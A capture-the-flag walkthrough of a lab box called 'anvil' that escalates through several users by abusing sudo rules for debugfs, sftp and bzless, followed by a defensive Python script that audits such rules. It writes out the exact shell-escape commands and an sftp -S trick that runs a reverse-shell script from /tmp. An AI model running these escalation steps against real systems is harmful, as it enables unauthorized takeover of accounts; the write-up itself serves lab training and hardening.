How’s your OS escalation skills? See if you can reach the final user (ETSCTF)
On each user you successfully escalate, there will be a flag on its home directory. This flag can also be used as a password to directly switch to that user (e.g. with su - copper) at a later time so that you don't have to go through all the steps every time you re-connect.
To start the challenge connect with nc -t 10.0.40.10 1337, or telnet 10.0.40.10 1337. Your timer starts from the first time you connect to the service.
Let's jump in without wasting too much time.
Shell As Silver
┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/anvil]
└─$ nc -t 10.0.40.10 1337
copper@anvil:~$ sudo -l
sudo -l
User copper may run the following commands on anvil:
(silver) NOPASSWD: /sbin/debugfs
copper@anvil:~$ id
id
uid=1001(copper) gid=1001(copper) groups=1001(copper)
copper@anvil:~$ sudo -u silver /sbin/debugfs
sudo -u silver /sbin/debugfs
debugfs 1.44.5 (15-Dec-2018)
debugfs: !sh
!sh
$ id
id
uid=1002(silver) gid=1002(silver) groups=1002(silver)
$
So I checked whether I can run sudo with any command. Luckily I got /sbin/debugfs, which was exploited above. Let's move to another user.
Shell As Gold
silver@anvil:/home/copper$ sudo -l
sudo -l
User silver may run the following commands on anvil:
(gold) NOPASSWD: /usr/bin/sftp
silver@anvil:/home/copper$
Seems we can run sftp with sudo, which is cool. Let's exploit it.
But it seems like a dead end. We know an SSH port is running, which is interesting, so I decided to host an SSH port on the target using SimpleHTTPServer.
Ready and running, let's try it again.
Seems like a dead end again: I can't create a .ssh directory, so I changed directory to /tmp to host a bash shell in a file with a reverse shell payload in it.
With that ready and made executable, and an Ncat listener on, let's hit it.
sudo -u gold /usr/bin/sftp -S /tmp/shell.sh muzec@localhost
Boom, we have a shell.
Shell As ETSCTF
sudo -u ETSCTF /bin/bzless -h
!sh
We are done.
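From the defender's side, every hop above is a sudo rule that delegates a binary able to start other programs. The following Python sketch is an added example, not part of the original write-up: it parses sudo -l style listings, flags rules for the three binaries used here, and lists which accounts become reachable by chaining them. The gold rule and the extra /usr/bin/id entry in the sample are assumptions, since gold's listing is not shown.

```python
import re

# Binaries the walkthrough pivoted through, and why delegating each via sudo is unsafe.
RISKY = {
    "debugfs": "'!' at the debugfs prompt runs a shell command",
    "sftp": "-S runs a caller-chosen program as the connection helper",
    "bzless": "'!' inside the pager runs a shell command",
}

# Constructed sample in `sudo -l` format. The copper and silver rules are shown above;
# gold's listing is not, so its rule (plus a benign /usr/bin/id) is an assumption.
SAMPLE = """\
User copper may run the following commands on anvil:
    (silver) NOPASSWD: /sbin/debugfs
User silver may run the following commands on anvil:
    (gold) NOPASSWD: /usr/bin/sftp
User gold may run the following commands on anvil:
    (ETSCTF) /bin/bzless, /usr/bin/id
"""

USER_RE = re.compile(r"^User (\S+) may run the following commands")
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z]+:\s*)*)(.+)$")

def audit(listing):
    """Return (user, run_as, binary, nopasswd, reason) for each risky rule."""
    findings, user = [], None
    for line in listing.splitlines():
        if m := USER_RE.match(line):
            user = m.group(1)
        elif m := RULE_RE.match(line):
            run_as, tags, commands = m.groups()
            for cmd in filter(None, (c.split() for c in commands.split(","))):
                binary = cmd[0].rsplit("/", 1)[-1]
                if binary in RISKY:
                    findings.append((user, run_as, binary, "NOPASSWD" in tags, RISKY[binary]))
    return findings

def reachable(findings, start):
    """Accounts reachable from `start` by chaining the risky rules."""
    seen, frontier = [], [start]
    while frontier:
        current = frontier.pop()
        for user, run_as, *_ in findings:
            if user == current and run_as != start and run_as not in seen:
                seen.append(run_as)
                frontier.append(run_as)
    return seen

if __name__ == "__main__":
    print("copper can reach:", reachable(audit(SAMPLE), "copper"))
```

Each flagged rule is a candidate for removal or for replacement with a wrapper that exposes only the one operation the user actually needs.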
Greetings from Muzec